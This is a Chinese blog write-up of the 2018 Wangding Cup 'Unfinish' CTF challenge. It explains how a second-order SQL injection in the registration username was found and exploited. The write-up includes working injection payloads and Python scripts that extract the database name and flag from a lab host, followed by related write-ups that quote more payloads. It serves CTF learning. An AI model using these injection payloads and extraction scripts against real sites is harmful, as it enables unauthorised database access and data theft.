[网鼎杯]2018Unfinish

最新推荐文章于 2024-08-12 09:52:00 发布
最新推荐文章于 2024-08-12 09:52:00 发布
阅读量660 收藏 7
点赞数 4
文章标签: sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_60286636/article/details/140923723
版权

使用ctf在线靶场https://adworld.xctf.org.cn/home/index。

进入靶场,发现是一个登录页面。

在这里插入图片描述

使用awvs进行扫描,发现存在login.php和register.php,并且register.php存在sql注入漏洞。

在这里插入图片描述

访问一下register.php试试,发现是一个注册页面。

在这里插入图片描述

在邮箱、用户名、密码分别尝试sql注入。

发现邮箱后面不允许添加符号’等,密码添加’等会被当做字符传入,而在用户名的地方输入’,注册失败,怀疑是在用户名处存在sql注入。

随便注册一个试试。

在这里插入图片描述

登陆进去发现,在页面中存在用户名的显示。

在用户名处输入

dhh ' and '1'='1

注册成功,登陆查看用户名为0。基本确定为二次注入,注入点为用户名处。

在这里插入图片描述

使用burp判断被过滤的字符。初步爆破发现单引号、逗号、information被过滤。那就开始尝试

注册时,让用户名为select database(),尝试一下。

登陆后发现,用户名直接显示为select database()。那么猜测应该是被单引号或者双引号包裹起来,作为字符串了,尝试两种闭合。

在这里插入图片描述

使用1’+2+'1可以注册成功,那就证明单引号没被过滤掉,而且可以看出来后台接收语句应该是select…where username=‘username’。

开始尝试构建payload。

0'+database()+'0     #结果为0

在这里插入图片描述

尝试使用ascii进行转换为10进制尝试,下面是转换database()的第一个字符。

0'+ascii(substr((database()) from 1 for 1))+'0

在这里插入图片描述

查看ascii表,发现119为w,也就是当前数据库第一个字母为w。那证明目前的思路是正确的。

写python脚本进行爆破。

import requests
from bs4 import BeautifulSoup


def jieguo():
    name = ''
    url = 'http://61.147.171.105:58807/'
    url1 = url + 'register.php'
    url2 = url + 'login.php'
    for i in range(1, 100):
        data_register = {"email": f"dhh{i}@163.com",
                         "username": f"0'+ascii(substr((database()) from {i} for 1))+'0;",
                         "password": "123"}
        data_login = {"email": f"dhh{i}@163.com",
                      "password": "123"}
        response_regiseter = requests.post(url1, data=data_register)
        response_login = requests.post(url2, data=data_login)
        bs = BeautifulSoup(response_login.text, 'html.parser')  # bs4解析页面
        username = bs.find('span', class_='user-name')  # 取返回页面数据的span class=user-name属性
        number = username.text  # 取该属性的数字
        name += chr(int(number))
        print(name)


if __name__ == '__main__':
    jieguo()

在这里插入图片描述

额…不知道为什么爆破完库名之后还在输出。

目前为止二次注入的目的完成。

因为我们的目的不是为了拿到flag,所以我就上网查询了一下如何拿flag,并且写成payload

0'+ascii(substr((select * from flag) from 1 for 1))+'0

import requests
from bs4 import BeautifulSoup


def jieguo():
    name = ''
    url = 'http://61.147.171.105:58807/'
    url1 = url + 'register.php'
    url2 = url + 'login.php'
    for i in range(1, 100):
        data_register = {"email": f"dh{i}@163.com",
                         "username": f"0'+ascii(substr((select * from flag) from {i} for 1))+'0;",
                         "password": "1"}
        data_login = {"email": f"dh{i}@163.com", "password": "1"}
        response_regiseter = requests.post(url1, data=data_register)
        response_login = requests.post(url2, data=data_login)
        bs = BeautifulSoup(response_login.text, 'html.parser')  # bs4解析页面
        username = bs.find('span', class_='user-name')  # 取返回页面数据的span class=user-name属性
        number = username.text  # 取该属性的数字
        name += chr(int(number))
        print(name)


if __name__ == '__main__':
    jieguo()

在这里插入图片描述

络安全 | CTF】fakebook(2018)解题详析
等风来
07-24 1万+
登录后发现传参,构造字符型参数,回显error判断为数字型注入,查看注入点数目:由上下两张图可知注入点数目为4经测试可知对空格进行过滤,可通过/**/或+绕过,但程序也过滤了+,因此使用前者no改为0的原因是使程序报错,从而回显库名fakebookno=0/**/union/**/select/**/1,(select/**/group_concat(column_name)/**/from information_schema.columns/**/where/**/table_name='users')
unfinish ctf 二次注入 无列名注入join-using
weixin_65785894的博客
08-06 740
成功回显管理员第一个字母w,当然后面可以多次注入,最后拼接数据库名为web,表名我们直接就猜flag了,当然你也可以通过mysql默认的sys去进行注入出来因为information被禁用了。我们不知道什么符号过滤了(绕过一些字符 一个一个试很麻烦,需要整理一些字符 (可以去 fuzz字典 查看))information被过滤掉之后,我们只能换方法,看看,其他库里还能不能拿到我们想要的数据。但是 里面并没有我们想要的结果 只有一些表的信息,没有列名的表。我们就查到了security中的表。
攻防世界Web:unfinish
Light_inthe_eyes的博客
10-20 437
打开页面后,是一个登录页面: 用御剑扫一扫,发现有注册页面: 用burpsuite抓注册页面: 尝试构造sql盲注语句:username=1' and left(database(),1)>'a'# 得到结果为nnnnoooo!!!过滤了很多 通过抓包出来的三个参数,猜测注册的语句是:insert into tables value('$email','$username','$passwpord'); 登录成功后语句:SELECT * FROM tables WHERE email = ''$em
【复习】BUUCTF:[2018]Unfinish --- python爬虫 + re sql注入,substr二次注入,hex二次注入 不用bool注入点的substr
Zero_Adam的博客
05-04 1424
目录:一、自己做:二、学到的三、 学习WPpython爬虫 + re 尝试(尝试思路,):1. substr思路:最后的payloadhex思路: 一、自己做: 测试,看到用户名有回显,那么就是又一次从数据库中查询数据,可能有SQL注入的可能,然后我在注册用户名的时候,加上了 ',然后就死活注册不了,, 也不给我报错,,我在这里也想了一会,,想不明白 后来想到了,可能是报错,然后就没执行,然后我用了万能密码来的。 用户名:a'1 or '1。 你注册成功后,他就会自动跳转到login.php的。 然后用邮箱
[2018]Unfinish
fmyyy1的博客
04-15 2571
场景 既然有login.php那就会有register.php,访问。 注册一个账号进去。 登录进去后看到我们的用户名了。 猜测在用户名处存在二次注入,再注册一个账号。 用户名变成了0,证明存在二次注入。 fuzz之后发现逗号,information等许多关键字被过滤了。 绕过方法: mysql中,+只能当做运算符。 执行select '1'+'1a'时 结果 执行select '0'+database(); 编程了0,但我们可以用ascii编码进行计算。 select '0'+ascii(
2018 Unfinish.rar
最新发布
10-28
尽管我们无法详细得知“ 2018 Unfinish”具体包含哪些挑战和学习材料,但可以推断出,这是一个以络安全为主题,旨在提高参赛者技术水平的赛事活动。参与者通过这类竞赛,不仅能够在实际操作中检验自己的技术...
[ 2018]unfinish.md
09-05
[ 2018]unfinish.md
Buu - [2018]Unfinish
夜风的博客
05-14 358
但同时,如果是 1’ or ‘1’='1 又能成功注册,这是肯定是单引号闭合,但是因为不能在后面跟注释符,如何进行闭合。解析:注册账号,将信息放在数据库中,登录进来比对数据库,将对应用户名拿出来回显在页面中。注入点在注册页面的用户名处,测试过滤了什么 => 单引号 语句后面跟注释符也被过滤。-> url/register.php => 有回显,可以注册账号。-> 注册完进来之后没有什么信息,能观察的就是左边有自己的用户名。流程:注册账号 -> 登录进来 -> 回显的是用户名。
2018 unfinish
feng的博客
10-29 2791
前言 又是一道SQL注入的题目,只能说自己还是太菜。。会的知识太少, WP 进入环境,用dirsearch扫一下,发现有index.php,login.php,register.php。 经过很多的尝试,最终发现这是一个二次注入的题目,注入点是在register.php传入的username中。 接下来就是如何注入了。我一开始考虑报错注入,但是发现不成功。经过尝试,发现过滤了逗号。这就意味了不能进行报错注入,而且不能通过闭合INSERT后面的(A,B,C)来实现注入。 这里我尝试进行union注入,但是过滤
-2018-Web-Unfinish
m0_63050933的博客
08-12 825
经过尝试,构造username=select database(),登录后显示用户名还是为select database(),说明后台代码可能把username用单引号引起来了,导致其无法显示。如果万能注入缺少符号,如果加@符又进不去,那我们尝试扫描文件,然后发现有一个register.php的文件,应该是注册页面,我们去打开。getUsername=soup.find_all('span')[0]#获取用户名。我们注册的用户名就是aaa,可以看出它回显出来了,我们尝试从这个地方注入
[2018]Unfinish 数据库注入‘+‘的利用
qq_54929891的博客
05-22 877
试一下万能账号登录1'or'1'='1'#,发现有邮箱格式,1@1’or'1'='1'#结果提示@后面不能有引号,算了去register.php瞅瞅,这种看url一般都有的 随便注册一个登录试试 发现用户名被回显到上面了,看来应该考的是二次注入了(这里注意每测试一次就要注册一个新的邮箱,不然用户名不会更改), 再用1'or'1'='1'#判断一下,结果注册失败!!!%23和-- 都不行可能是被过滤掉了,而且你单独输入一个#又会显示注册成功不知道 但我们输入1'or'1'='1进行前后引号闭合的..
[2018]Unfinish解题,五分钟带你解题
m0_69151365的博客
08-05 1394
这道题是一道很经典的二次注入题目,回顾解题过程,我们显示登录页面找不到注入点,然后开始扫描目录寻找其他注入点,找到register注册页面,注册完之后登录发现出现了用户名,那我们就考虑注入点是不是在username,开始注入发现结果是0,所以我们就想着用转ascii码等方式来注入,很明显这种方法是正确的,然后information被过滤,我们就尝试用sys来注入表名,但是并没有成功,可能应为不是MySQL所以没有成功,官方也没有放源码出来,所以我们就猜测表名是flag,然后编写python脚本,最后解出
XCTF:unfinish2018)(SQL二次注入
羽的博客
09-14 1378
见到这题,我就和上面的图片是一样的(很形象) 扫出个注册页面 简单fuzz,可以知道他过滤了逗号和information,没有逗号,就防止了报错注入,因为注册界面一般是insert语句。又把information这个SQL注入中重要的数据库过滤了。然后就很难。 正确思路应该是二次注入 当注册时用户名使用:1' and '0 当注册时用户名为:1' and '1 所以这里是存在二次注入的。 在mysql中,+只能当做运算符。 ...
BUUCTF--[2018]Unfinish
qq_46263951的博客
07-14 894
首先进入页面后我们发现有两个输入框,简单尝试后并没有发现可用漏洞,使用dirsearch扫描后找到一个register.php 进入register.php我们可以进行注册,成功注册后可以发现登录进去后账户名显示出来了,推测存在二次注入 方法一: HEX:返回十六进制数值表示形式 import requests login_url='http://220.249.52.133:39445/login.php' register_url='http://220.249.52.133:39.
记录BUUCTF [2018]Unfinish1解题思路
Aiwin的博客
05-18 1397
记录BUUCTF [2018]Unfinish1解题思路
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

麦农111

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值